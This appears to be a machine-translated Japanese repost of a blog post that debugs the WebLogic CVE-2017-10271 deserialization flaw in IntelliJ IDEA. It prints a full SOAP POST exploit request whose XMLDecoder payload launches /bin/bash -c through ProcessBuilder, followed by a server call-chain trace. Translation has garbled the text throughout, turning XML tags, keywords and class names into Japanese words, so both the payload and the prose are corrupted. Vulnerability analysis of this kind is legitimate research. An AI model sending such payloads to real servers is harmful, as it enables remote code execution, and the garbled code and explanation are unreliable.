IDEAのデバッグの脆弱性最初の記事(のweblogic、CVE-2017から10271)

weblogic.wsee.jaxws.WLSServletAdapterの129行でRBI

1  であれば(var2.getMethod()。等号( "GET")|| var2.getMethod()。等号( "ヘッド")){

そして、デバッグモード、契約、インターセプト要求パケットのブレークポイントをオンにします。

パッケージ内容げっぷ:

POST / WLS-WSAT / CoordinatorPortType11 HTTP / 1.1 
ホスト:localhostを:7001 
のContent-Type:text / xmlでの
コンテンツの長さ:987 

<?XMLバージョン= "1.0" ?> 
< soapenv:封筒のxmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/" > 
    < soapenv:ヘッダー> 
        < 作業:ワークコンテキストののxmlns:仕事= "のhttp:/ /bea.com/2004/06/soap/workarea/」> 
            < Javaのバージョン= "1.8.0_131" クラス= "java.beans.XMLDecoder" > 
                < 無効クラス= "java.lang.ProcessBuilder" >
                    = "java.lang.Stringで" 長さ= "3" > 
                        < 空隙= "0" > 
                            < ストリング> / binに/ bashの</ 文字列> 
                        </ 空隙> 
                        < 空隙= "1" > 
                            < ストリング> -C </ 文字列> 
                        </ 無効> 
                        < 空隙= "2" > 
                            < ストリング>番号</ 文字列> 
                        </ > 
                    </ 配列>
                    < 無効方法= "スタート"  /> 
                </ 無効> 
            </ javaの> 
        </ 仕事:ワークコンテキスト> 
    </ soapenv:ヘッダー> 
    < soapenv:ボディ/> 
</ soapenv:封筒>

 

(下から上へ)チェーンを呼び出します

 

processRequest:43、WorkContextServerTube(weblogic.wsee.jaxws.workcontext)
__doRun:866、ファイバ(com.sun.xml.ws.api.pipe)
_doRun:815、ファイバ(com.sun.xml.ws.api.pipe)
doRun:778、光ファイバ(com.sun.xml.ws.api.pipe)
runSync:680、光ファイバ(com.sun.xml.ws.api.pipe)
プロセス:403、WSEndpointImpl $ 2(com.sun.xml.ws .server)
ハンドル:539、のHttpAdapter $ HttpToolkit(com.sun.xml.ws.transport.http)
ハンドル:253、のHttpAdapter(com.sun.xml.ws.transport.http)
ハンドル:140、ServletAdapter(はcom.sun .xml.ws.transport.http.servlet)
ハンドル:171、WLSServletAdapter(weblogic.wsee.jaxws)
を実行:708、HttpServletAdapter $ AuthorizedInvoke(weblogic.wsee.jaxws)
のdoAs:363、AuthenticatedSubject(weblogic.security.acl.internal )
runAs:146、セキュリティマネージャ(するweblogic.security.service)
authenticatedInvoke:103、ServerSecurityHelper(weblogic.wsee.util)
を実行します。311、HttpServletAdapter $ 3(weblogic.wsee.jaxws)
ポスト:336、HttpServletAdapter(weblogic.wsee.jaxws)
doRequest :99、JAXWSServlet(weblogic.wsee.jaxws)
サービス:99、AbstractAsyncServlet(weblogic.servlet.http)
サービス:820、HttpServletを(のjavax.servlet.http)
走行:227、StubSecurityHelper $ ServletServiceAction(weblogic.servlet.internal)
invokeServlet :125、StubSecurityHelper(weblogic.servlet.internal)
を実行:301、ServletStubImpl(weblogic.servlet.internal)
を実行:184、ServletStubImpl(weblogic.servlet.internal)
wrapRun:3732、WebAppServletContext $ ServletInvocationAction(weblogic.servlet.internal)
を実行:3696、WebAppServletContext $ ServletInvocationAction(weblogic.servlet.internal)
のdoAs:321、AuthenticatedSubject(weblogic.security.acl.internal)
のrunAs:120、セキュリティマネージャ(のweblogic。 security.service)
securedExecute:2273、WebAppServletContext(weblogic.servlet.internal)
実行:2179、WebAppServletContext(weblogic.servlet.internal)を
実行します。1490、ServletRequestImpl(weblogic.servlet.internal)
を実行:256、ExecuteThread(weblogic.work)
実行:221、ExecuteThread(weblogic.work)

 129改行weblogic.wsee.jaxws.WLSServletAdapter

 そして、次のステップのデバッグ

我々はポスト要求されているので、この条件は明らかにF8をスキップすることができます。入力する必要はありませんと。

super.handle(VAR1、VAR2、VAR3)が来ました。

散歩

そして最後に

 

 

 

これは、質問に来ています。

VAR1を見て

 それは私たちのポストコンテンツであります

 

 this.readHeaderOld(VAR3)をフォロー。

ビューVAR4

 

 

実際の根底にあるトリガーポイント

 

 

 

おすすめ

転載: www.cnblogs.com/ph4nt0mer/p/11775908.html